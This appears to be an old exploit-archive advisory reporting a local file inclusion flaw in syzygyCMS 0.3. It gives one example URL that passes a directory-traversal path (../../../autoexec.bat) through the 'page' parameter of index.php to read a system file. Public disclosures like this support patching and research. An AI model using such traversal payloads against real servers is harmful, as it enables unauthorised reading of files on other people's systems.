syzygyCMS 0.3 (index.php page) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : syzygyCMS 0.3 (index.php page) Local File Inclusion Vulnerability
# Published : 2008-08-03
# Author : SirGod
# Previous Title : Joomla Component EZ Store Remote Blind SQL Injection Exploit
# Next Title : e-Vision CMS <= 2.02 (SQL/Upload/IG) Multiple Remote Vulnerabilities

######################################
[+] syzygyCMS 0.3 Local File Inclusion    
[+] Discovered By SirGod                           
[+] www.mortal-team.com                           
[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin
[+] also ToxicBlood,MesSiAH,xZu
######################################

Example :

http://localhost/x/index.php?page=../../../autoexec.bat

This will open autoexec.bat .

###########################################

# www.Syue.com [2008-08-03]